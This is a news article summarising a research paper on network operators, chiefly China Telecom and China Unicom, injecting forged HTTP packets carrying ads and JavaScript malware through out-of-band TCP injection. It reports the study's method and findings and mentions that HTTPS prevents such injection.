Three Israeli researchers claim to have uncovered evidence of traffic injection – including malware – taking place at the infrastructural level of network connectivity, rather than via edge ISPs who are merely leasing line space. The primary originators of the attacks appear to be China Telecom and China Unicom, two of Asia’s largest network operators.

In the paper Website-Targeted False Content Injection by Network Operators [PDF], Gabi Nakibly, Jaime Schcolnik, and Yossi Rubin outline several months spent analysing bidirectional http traffic captured by the netsniff-ng toolkit, and their discovery of packet injection relating to ads and malware. Interestingly the technique they saw in use, Out-of-band TCP Injection, did not involve interception and rewriting of the network packets, but rather cloning, wherein the actor replicates and adulterates a network packet and then sends it on ahead of the original packet:

‘Our study is based on the observation that the forged traffic is injected in an out-of-band manner: the network operators do not update the network packets in-path, but rather send the forged packets without dropping the legitimate ones. This creates a race between the forged and the legitimate packets as they arrive to the end user. This race can be identified and analyzed. Our analysis shows that the main purpose of content injection is to increase the network operators’ revenue by inserting advertisements to websites. Nonetheless, surprisingly, we have also observed numerous cases of injected malicious content.’

The researchers note that the use of https, presumably at a reasonably strong level of encryption, precludes the kind of attacks detailed in the paper. They emphasise also that the injections do not originate at the level of ISPs, who are merely occupying infrastructure space, and who may have a history of trying to monetise their users’ traffic by interjecting ads into it.

china-network-injection-pathologyThough advertisement injection predominates in the cases studied, approximately 40% of the injection attempts involved the placement of JavaScript-based malware. In one case an attack injected a JavaScript that appends content to the domain, and another prompted a download of an executable file. In one case the domain registered to Gambling Portal Webmasters Association ( was subject to forged content by the similarly-named but otherwise empty domain, registered in Romania.

The paper describes the process of forging a TCP segment over an unencrypted connection as ‘trivial’, and the study involved analysis of 1.5 petabytes of data and 1.5 million IP addresses.

The implications of the study, if true, are significant, in that interception and packet-replication is taking place at an infrastructural level, the highest available vantage point on any network.